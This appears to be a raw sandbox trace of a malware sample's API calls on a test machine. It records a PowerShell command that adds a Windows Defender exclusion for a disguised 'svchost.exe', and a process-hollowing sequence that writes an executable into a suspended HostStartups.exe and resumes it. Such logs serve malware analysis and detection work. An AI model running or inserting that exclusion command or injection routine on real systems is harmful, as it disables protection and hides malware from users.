thread_handle: 0x000007a0
process_identifier: 3292
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe" -Force
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007c0
1 1 0

NtResumeThread

thread_handle: 0x000007dc
suspend_count: 1
process_identifier: 996
1 0 0

CreateProcessInternalW

thread_identifier: 1388
thread_handle: 0x000007e4
process_identifier: 1404
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c timeout 1
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000007fc
1 1 0

CreateProcessInternalW

thread_identifier: 7640
thread_handle: 0x000007f0
process_identifier: 2576
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\HostStartups.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\HostStartups.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000007ec
1 1 0

NtGetContextThread

thread_handle: 0x000007f0
1 0 0

NtAllocateVirtualMemory

process_identifier: 2576
region_size: 225280
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000007ec
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELr:k_à  hS$0@pjí  10äPÀ`ô À3ø.texth P`.data<o0p@`À.eh_framØ †@0@.bss„f°€`À.edata1 Œ@0@.idataä0Ž@0À.rsrcÀP¤@@.relocô `¨@0B
base_address: 0x00400000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00423000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: (non-printable binary data; the captured bytes do not render as text)
base_address: 0x0042a000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: r:k_( ( ( ( 
base_address: 0x00432000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00433000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: €0€ HXPhäh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsWkLW Rjlr(CompanyNameJeq8FileDescriptionFtH TRx0FileVersion3.6.3.7: InternalNameYjFX Hxl.exez+LegalCopyrightCopyright 2020 © YPO. All rights reserved.2LegalTrademarksVkaDB OriginalFilenameYjFX Hxl.exe2 ProductNameYjFX Hxl4ProductVersion3.4.1.48Assembly Version3.4.1.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING
base_address: 0x00435000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: (non-printable binary data; the captured bytes do not render as text)
base_address: 0x00436000
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

WriteProcessMemory

buffer: @
base_address: 0xfffde008
process_identifier: 2576
process_handle: 0x000007ec
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4203603
registers.ebp: 0
registers.edx: 0
registers.ebx: -139264
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000007f0
process_identifier: 2576
1 0 0

NtResumeThread

thread_handle: 0x000007f0
suspend_count: 1
process_identifier: 2576
1 0 0

NtResumeThread

thread_handle: 0x00000294
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

thread_handle: 0x00000444
suspend_count: 1
process_identifier: 7112
1 0 0

NtResumeThread

thread_handle: 0x000004a4
suspend_count: 1
process_identifier: 7112
1 0 0